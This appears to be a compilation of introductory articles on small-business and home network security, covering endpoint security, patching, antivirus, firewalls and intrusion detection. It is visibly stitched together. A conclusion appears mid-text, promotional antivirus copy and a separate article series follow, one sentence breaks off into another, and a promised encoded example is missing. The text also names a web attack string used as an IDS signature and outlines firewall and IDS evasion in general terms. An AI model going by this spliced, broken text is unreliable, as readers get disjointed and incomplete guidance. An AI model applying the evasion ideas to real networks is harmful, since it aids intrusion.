Endpoint Security

A lot of information in an organization is not centralized. Even when there is a central system, information isoften shared between different users, different devices and copied numerous times. In contrast with perimetersecurity, endpoint security is the concept that each device in an organization needs to be secured. It isrecommended that sensitive information is encrypted on portable devices such as laptops.

Additionally,removable storage such as DVD drives, floppy drives and USB ports may be blocked if they are considered to bea major threat vector for malware infections or data leakage.Securing endpoints on a network may require extensive planning and auditing. For example, policies can beapplied that state that only certain computers (e.g. laptops) can connect to specific networks. It may also makesense to restrict usage of wireless (WiFi) access points.

Policies

Policies are the basis of every information security program. It is useless taking security precautions or trying tomanage a secure environment if there are no objectives or clearly defined rules. Policies clarify what is or is notallowed in an organization as well as define the procedures that apply in different situations. They should beclear and have the full backing of senior management. Finally they need to be communicated to theorganization’s staff and enforced accordingly.

There are various policies, some of which can be enforced through technology and others which have to beenforced through human resources. For example, password complexity policies can be enforced throughWindows domain policies. On the other hand, a policy which ensures that company USB sticks are not takenhome may need to be enforced through awareness and labeling.

As with most security precautions, it isimportant that policies that affect security are driven by business objectives rather than gut feelings. If securitypolicies are too strict, they will be bypassed, thus creating a false sense of security and possibly create newattack vectors.

Role Separation

Separation of duties, auditing and the principle of least privilege can go a long way in protecting anorganization from having single points of failure and privilege creep. By employing separation of duties, theimpact of a particular employee turning against the organization is greatly reduced. For example, a systemadministrator who is not allowed to make alterations to the database server directly, but has to ask thedatabase administrator and document his actions, is a good use of separation of duties.

A security analyst whoreceives a report when a network operator makes changes to the firewall access control lists is a goodapplication of auditing. If a manager has no business need to install software on a regular basis, then his or heraccount should not be granted such privileges (power user on Windows). These concepts are very importantand it all boils down to who is watching the watchers.

Backup and Redundant Systems

Although less glamorous than other topics in Information Security, backups remain one of the most reliablesolutions. Making use of backups can have a direct business benefit when things go wrong. Disasters do occurand an organization will come across situations when hardware fails or a user (intentionally or otherwise)deletes important data.

A well-managed and tested backup system will get the business back up and runningin very little time compared to other disaster recovery solutions. It is therefore important that backups are notonly automated to avoid human error but also periodically tested. It is useless having a backup system ifrestoration does not function as advertised.Redundant systems allow a business to continue working even if a disaster occurs.

Backup servers andalternative network connections can help to reduce downtime or at least provide a business with limitedresources until all systems and data are restored.

Keeping your Systems Patched

New advisories addressing security vulnerabilities in software are published on a daily basis. It is not an easytask to stay up-to-date with all the vulnerabilities that apply for software installed on the network, thereforemany organizations make use of a patch management system to handle the task. It is important to note thatpatches and security updates are not only issued for Microsoft products but also for third party software. Forexample, although the web browser is running the latest updates, a desktop can still be compromised whenvisiting a website simply because it is running a vulnerable version of Adobe Flash.

Additionally it may beimportant to assess the impact of vulnerability before applying a patch, rather than applying patchesreligiously. It is also important to test security updates before applying them to a live system. The reason is that,from time to time, vendors issue patches that may conflict with other systems or that were not tested for yourparticular configuration.

Additionally, security updates may sometimes result in temporary downtime, forexposureSimple systems are easier to manage and therefore any security issues that apply to such systems can beaddressed with relative ease. However, complex systems and networks make it harder for a security analyst toassess their security status. For example, if an organization does not need to expose a large number of services on the Internet, the firewall configuration would be quite straightforward. However, the greater the company’sneed to be visible – an online retailer, for example – the more complex the firewall configuration will be, leavingroom for possible security holes that could be exploited by attackers to access internal network services.

When servers and desktop computers have fewer software packages installed, they are easier to keep up-todateand manage. This concept can work hand in hand with the principle of least privilege. By making use offewer components, fewer software and fewer privileges, you reduce the attack surface while allowing forsecurity to be more focused to tackle real issues.

Conclusion

Security in small and medium-sized businesses is more than just preventing viruses and blocking spam. In 2009,cybercrime is expected to increase as criminals attempt to exploit weaknesses in systems and in people. Thisdocument aims to give managers, analysts, administrators and operators in small and medium-sized businessesa snapshot of the IT security threats facing their organization. Every organization is different but in manyinstances the threats are common to all. Security is a cost of doing business but those that prepare themselveswell against possible threats will benefit the most in the long term.

There are several antivirus engines on the market and each product has its own heuristics, and subsequently its own particular strengths and weaknesses. It's impossible to claim any one as the best overall at any given time. It can never be predicted which antivirus lab will be the quickest to release an update providing protection against the next virus outbreak; it is often one company on one occasion and another one the next.

Web security can never be one hundred percent guaranteed at all times, but, there are ways to significantly minimize the risks. It is good and usual practice to use an antivirus engine to help protect your network, but it would naturally be much better to use several of them at once. Why is this? If, hypothetically speaking, your organization uses product A, and a new virus breaks out, it might be Lab A or Lab B, or any other antivirus lab, which releases an update the fastest. So the logical conclusion would be that, the more AV engines you make use of, the greater the likelihood of you nipping that attack in the bud.

This is one of the ways in which web security software can give you better peace of mind. Files which are downloaded on any of your company's computers can each be scanned using several engines, rather than just one, which could significantly reduce the time it will take to obtain the latest virus signatures, therefore diminishing the risk to your site by each new attack.

Another plus side of web security software is that multiple download control policies can be set according to the individual organization's security policies, which could be either user, group or IP-based, controlling the downloading of different file types such as JavaScript, MP3, MPEG, exe, and more by specific users/groups/IP addresses. Hazardous files like Trojan downloader programs very often appear disguised as harmless files in order to gain access to a system. A good web security solution will analyze and detect the real file types HTTP/FTP file downloads, making sure that files which are downloaded contain no viruses or malware.

The long and short of it is this: you want the best security possible for your network, but it's not within anyone's power to predict where the next patch will come from. Rather than playing Russian roulette by sticking to one AV engine, adopt a web security package that will enable you to use several of them.

Web security threats include phishing attacks, malware, scareware, rootkits, keyloggers, viruses and spam. While many attacks occur when information is downloaded from a website, others are now possible through drive-by attacks where simply visiting a website can infect a computer. These attacks usually result in data and information leakage, loss in productivity, loss of network bandwidth and, depending on the circumstances, even liability issues for the company. In addition to all this, cleanup from malware and other types of attacks on a company's network are usually costly from both the dollar aspect as well as the time spent recovering from these web security threats.

Fortunately, there are steps a company can take to protect itself from these web security threats. Some are more effective than others, but the following suggestions should help narrow down the choices.

Employee Internet Usage Policy

The first and probably the least expensive solution would be to develop and implement an employee internet usage policy. This policy should clearly define what an employee can and cannot do when using the internet. It should also address personal usage of the internet on the business computer. The policy should identify the type of websites that can be accessed by the employee for business purposes and what, if any, type of material can be downloaded from the internet. Always make sure the information contained in the policy fits your unique business needs and environment.

Employee Education

Train your employees to recognize web security threats and how to lower the risk of infection. In today's business environment, laptops, smartphones, iPads, and other similar devices are not only used for business purposes, but also for personal and home use. When devices are used at home, the risk of an infection on that device is high and malware could easily be transferred to the business network. This is why employee education is so important.

Patch Management

Good patch management practices should also be in place and implemented using a clearly-defined patch management policy. Operating systems and applications, including browsers, should be updated regularly with the latest available security patches. The browser, whether a mobile version used on a smartphone or a full version used on a computer, is a primary vector for malware attacks and merits particular attention. Using the latest version of a browser is a must as known vulnerabilities would have been addressed

Internet Monitoring Software

Lastly, I would mention the use of internet monitoring software. Internet monitoring software should be able to protect the network against malware, scareware, viruses, phishing attacks and other malicious software. A robust internet monitoring software solution will help to enforce your company's internet usage policy by blocking connections to unacceptable websites, by monitoring downloads, and by monitoring encrypted web traffic going into and out of the network.

There is no single method that can guarantee 100% web security protection, however a well thought-out strategy is one huge step towards minimizing risk that the network could be targeted by the bad guys.

All IT venodors agree today that secure computing is no longer an optional component, it is something that should be integrated into every system rather than being thrown in as an afterthought. Usually programmers would concentrate on getting a program working, and then (if there was time) try and weed out possible security holes.

Now, applications must be coded from the ground up with security in mind, as these applications will be used by people who expect the security and privacy of their data to be maintained.

This article intends to serve as a very brief introduction to information security with an emphasis on networking.

The reasons for this are twofold:

Firstly, in case you did not notice.. this is a networking website,

Secondly, the time a system is most vulnerable is when it is connected to the Internet.

For an understanding of what lies in the following pages, you should have decent knowledge of how the Internet works. You don't need to know the ins and outs of every protocol under the sun, but a basic understanding of network (and obviously computer) fundamentals is essential.

If you're a complete newbie however, do not despair. We would recommend you look under the Networking menu at the top of the site...where you will find our accolade winning material on pretty much everything in networking.

Hacker or Cracker?

There is a very well worn out arguement against using the incorrect use of the word 'hacker' to denote a computer criminal -- the correct term is a 'cracker' or when referring to people who have automated tools and very little real knowledge, 'script kiddie'. Hackers are actually just very adept programmers (the term came from 'hacking the code' where a programmer would quickly program fixes to problems he faced).

While many feel that this distinction has been lost due to the media portraying hackers as computer criminals, we will stick to the original definitions through these articles more than anything to avoid the inevitable flame mail we will get if we don't !

On to the Cool Stuff!

This introduction is broadly broken down into the following parts :

• The Threat to Home Users
• The Threat to the Enterprise
• Common Security Measures Explained
• Intrusion Detection Systems
• Tools an Attacker Uses
• What is Penetration-Testing?
• A Brief Walk-through of an Attack
• Where Can I Find More Information?
• Conclusion

The Threat to Home Users

Many people underestimate the threat they face when they use the Internet. The prevalent mindset is "who would bother to attack me or my computer?", while this is true -- it may be unlikely that an attacker would individually target you, as to him, you are just one more system on the Internet.

Many script kiddies simply unleash an automated tool that will scan large ranges of IP addresses looking for vulnerable systems, when it finds one, this tool will automatically exploit the vulnerability and take control of this machine.

The script kiddie can later use this vast collection of 'owned' systems to launch a denial of service (DoS) attacks, or just cover his tracks by hopping from one system to another in order to hide his real IP address.

This technique of proxying attacks through many systems is quite common, as it makes it very difficult for law enforcement to back trace the route of the attack, especially if the attacker relays it through systems in different geographic locations.

It is very feasible -- in fact quite likely -- that your machine will be in the target range of such a scan, and if you haven't taken adequate precautions, it will be owned.

The other threat comes from computer worms that have recently been the subject of a lot of media attention. Essentially a worm is just an exploit with a propagation mechanism. It works in a manner similar to how the script kiddie's automated tool works -- it scans ranges of IP addresses, infects vulnerable machines, and then uses those to scan further.

Thus the rate of infection increases geometrically as each infected system starts looking for new victims. In theory a worm could be written with such a refined scanning algorithm, that it could infect 100% of all vulnerable machines within ten minutes. This leaves hardly any time for response.

Another threat comes in the form of viruses, most often these may be propagated by email and use some crude form of social engineering (such as using the subject line "I love you" or "Re: The documents you asked for") to trick people into opening them. No form of network level protection can guard against these attacks.

The effects of the virus may be mundane (simply spreading to people in your address book) to devastating (deleting critical system files). A couple of years ago there was an email virus that emailed confidential documents from the popular Windows "My Documents" folder to everyone in the victims address book.

So while you per se may not be high profile enough to warrant a systematic attack, you are what I like to call a bystander victim.. someone who got attacked simply because you could be attacked, and you were there to be attacked.

As broadband and always-on Internet connections become commonplace, even hackers are targetting the IP ranges where they know they will find cable modem customers. They do this because they know they will find unprotected always-on systems here that can be used as a base for launching other attacks.

The Threat to the Enterprise

Most businesses have conceded that having an Internet presence is critical to keep up with the competition, and most of them have realised the need to secure that online presence.

Gone are the days when firewalls were an option and employees were given unrestricted Internet access. These days most medium sized corporations implement firewalls, content monitoring and intrusion detection systems as part of the basic network infrastructure.

For the enterprise, security is very important -- the threats include:

• Corporate espionage by competitors,
• Attacks from disgruntled ex-employees
• Attacks from outsiders who are looking to obtain private data and steal the company's crown jewels (be it a database of credit cards, information on a new product, financial data, source code to programs, etc.)
• Attacks from outsiders who just want to use your company's resources to store pornography, illegal pirated software, movies and music, so that others can download and your company ends up paying the bandwidth bill and in some countries can be held liable for the copyright violations on movies and music.

As far as securing the enterprise goes, it is not enough to merely install a firewall or intrustion detection system and assume that you are covered against all threats. The company must have a complete security policy and basic training must be imparted to all employees telling them things they should and should not do, as well as who to contact in the event of an incident. Larger companies may even have an incident response or security team to deal specifically with these issues.

One has to understand that security in the enterprise is a 24/7 problem. There is a famous saying, "A chain is only as strong as its weakest link", the same rule applies to security.

After the security measures are put in place, someone has to take the trouble to read the logs, occasionally test the security, follow mailing-lists of the latest vulnerabilities to make sure software and hardware is up-to-date etc. In other words, if your organisation is serious about security, there should be someone who handles security issues.

This person is often a network administrator, but invariably in the chaotic throes of day-to-day administration (yes we all dread user support calls ! :) the security of the organisation gets compromised -- for example, an admin who needs to deliver 10 machines to a new department may not password protect the administrator account, just because it saves him some time and lets him meet a deadline. In short, an organisation is either serious about security issues or does not bother with them at all.

While the notion of 24/7 security may seem paranoid to some people, one has to understand that in a lot of cases a company is not specifically targetted by an attacker. The company's network just happen to be one that the attacker knows how to break into and thus they get targetted. This is often the case in attacks where company ftp or webservers have been used to host illegal material.

The attackers don't care what the company does - they just know that this is a system accessible from the Internet where they can store large amounts of warez (pirated software), music, movies, or pornography. This is actually a much larger problem than most people are aware of because in many cases, the attackers are very good at hiding the illegal data. Its only when the bandwidth bill has to be paid that someone realises that something is amiss.

Firewalls

By far the most common security measure these days is a firewall. A lot of confusion surrounds the concept of a firewall, but it can basically be defined as any perimiter device that permits or denies traffic based on a set of rules configured by the administrator. Thus a firewall may be as simple as a router with access-lists, or as complex as a set of modules distributed through the network controlled from one central location.

The firewall protects everything 'behind' it from everything in front of it. Usually the 'front' of the firewall is its Internet facing side, and the 'behind' is the internal network. The way firewalls are designed to suit different types of networks is called the firewall topology.

Here is the link to a detailed explanation of different firewall topologies :Firewall.cx Firewall Topologies

You also get what are known as 'personal firewalls' such as Zonealarm, Sygate Personal Firewall , Tiny Personal Firewall , Symantec Endpoint Security etc.

These are packages that are meant for individual desktops and are fairly easy to use. The first thing they do is make the machine invisible to pings and other network probes. Most of them also let you choose what programs are allowed to access the Internet, therefore you can allow your browser and mail client, but if you see some suspicious program trying to access the network, you can disallow it. This is a form of 'egress filtering' or outbound traffic filtering and provides very good protection against trojan horse programs and worms.

However firewalls are no cure all solution to network security woes. A firewall is only as good as its rule set and there are many ways an attacker can find common misconfigurations and errors in the rules. For example, say the firewall blocks all traffic except traffic originating from port 53 (DNS) so that everyone can resolve names, the attacker could then use this rule to his advantage. By changing the source port of his attack or scan to port 53, the firewall will allow all of his traffic through because it assumes it is DNS traffic.

Bypassing firewalls is a whole study in itself and one which is very interesting especially to those with a passion for networking as it normally involves misusing the way TCP and IP are supposed to work. That said, firewalls today are becoming very sophisticated and a well installed firewall can severely thwart a would-be attackers plans.

It is important to remember the firewall does not look into the data section of the packet, thus if you have a webserver that is vulnerable to a CGI exploit and the firewall is set to allow traffic to it, there is no way the firewall can stop an attacker from attacking the webserver because it does not look at the data inside the packet. This would be the job of an intrusion detection system (covered further on).

Anti-Virus Systems

Everyone is familiar with the desktop version of anti virus packages like Norton Antivirus and Mcafee. The way these operate is fairly simple -- when researchers find a new virus, they figure out some unique characteristic it has (maybe a registry key it creates or a file it replaces) and out of this they write the virus 'signature'.

The whole load of signatures that your antivirus scans for what is known as the virus 'definitions'. This is the reason why keeping your virus definitions up-to-date is very important. Many anti-virus packages have an auto-update feature for you to download the latest definitions. The scanning ability of your software is only as good as the date of your definitions. In the enterprise, it is very common for admins to install anti-virus software on all machines, but there is no policy for regular update of the definitions. This is meaningless protection and serves only to provide a false sense of security.

With the recent spread of email viruses, anti-virus software at the MTA (Mail Transfer Agent , also known as the 'mail server') is becoming increasingly popular. The mail server will automatically scan any email it recieves for viruses and quarantine the infections. The idea is that since all mail passes through the MTA, this is the logical point to scan for viruses. Given that most mail servers have a permanent connection to the Internet, they can regularly download the latest definitions. On the downside, these can be evaded quite simply. If you zip up the infected file or trojan, or encrypt it, the anti-virus system may not be able to scan it.

End users must be taught how to respond to anti virus alerts. This is especially true in the enterprise -- an attacker doesn't need to try and bypass your fortress like firewall if all he has to do is email trojans to a lot of people in the company. It just takes one uninformed user to open the infected package and he will have a backdoor to the internal network.

It is advisable that the IT department gives a brief seminar on how to handle email from untrusted sources and how to deal with attachments. These are very common attack vectors simply because you may harden a computer system as much as you like, but the weak point still remains the user who operates it. As crackers say 'The human is the path of least resistance into the network'.

Intrusion Detection Systems

IDS's have become the 'next big thing' the way firewalls were some time ago. There are bascially two types of Intrusion Detection Systems :

• Host based IDS
• Network based IDS

Host based IDS - These are installed on a particular important machine (usually a server or some important target) and are tasked with making sure that the system state matches a particular set baseline. For example, the popular file-integrity checker Tripwire -- this program is run on the target machine just after it has been installed. It creates a database of file signatures for the system and regularly checks the current system files against their known 'safe' signatures. If a file has been changed, the administrator is alerted. This works very well as most attackers will replace a common system file with a trojaned version to give them backdoor access.

Network based IDS - These are more popular and quite easy to install. Basically they consist of a normal network sniffer running in promiscuous mode (in this mode the network card picks up all traffic even if its not meant for it). The sniffer is attached to a database of known attack signatures and the IDS analyses each packet that it picks up to check for known attacks. For example a common web attack might contain the string '/system32/cmd.exe?' in the URL. The IDS will have a match for this in the database and will alert the administrator.

Newer IDS' support active prevention of attacks - instead of just alerting an administrator, the IDS can dynamically update the firewall rules to disallow traffic from the attacking IP address for some amount of time. Or the IDS can use 'session sniping' to fool both sides of the connection into closing down so that the attack cannot be completed.

Unfortunately IDS systems generate a lot of false positives (a false positive is basically a false alarm, where the IDS sees legitimate traffic and for some reason matches it against an attack pattern) this tempts a lot of administrators into turning them off or even worse -- not bothering to read the logs. This may result in an actual attack being missed.

IDS evasion is also not all that difficult for an experienced attacker. The signature is based on some unique feature of the attack, and so the attacker can modify the attack so that the signature is not matched. For example, the above attack string '/system32/cmd.exe?' could be rewritten in hexadecimal to look something like the following:

Which might be totally missed by the IDS. Furthermore, an attacker could split the attack into many packets by fragmenting the packets. This means that each packet would only contain a small part of the attack and the signature would not match. Even if the IDS is able to reassemble fragmented packets, this creates a time overhead and since IDS' have to run at near real-time status, they tend to drop packets while they are processing. IDS evasion is a topic for a paper on its own.

The advantage of a network based IDS is that it is very difficult for an attacker to detect. The IDS itself does not need to generate any traffic, and in fact many of them have a broken TCP/IP stack so they don't have an IP address. Thus the attacker does not know whether the network segment is being monitored or not.

Patching and Updating

It is embarassing and sad that this has to be listed as a security measure. Despite being one of the most effective ways to stop an attack, there is a tremendously laid back attitude to regulary patching systems. There is no excuse for not doing this, and yet the level of patching remains woefully inadequate. Take for example the MSblaster worm that spread havoc recently. The exploit was known almost a month in advance, and a patch had been released, still millions of users and businesses were infected. While admins know that having to patch 500 machines is a laborious task, the way I look at it is I would rather be updating my systems on a regular basis than waiting for disaster to strike and then running around trying to patch and clean up those 500 systems.

For the home user, its a simple matter of running the automatic update software that every worthwhile OS comes with. In the enterprise there is no 'easy' way to patch large numbers of machines, but there are patch deployment mechanisms that take a lot of the burden away. Frankly, it is part of an admin's job to do this, and when a network is horribly fouled up by the latest worm it just means someone, somewhere didn't do his job well enough.

Click here to read 'Introduction to Network Security - Part 2'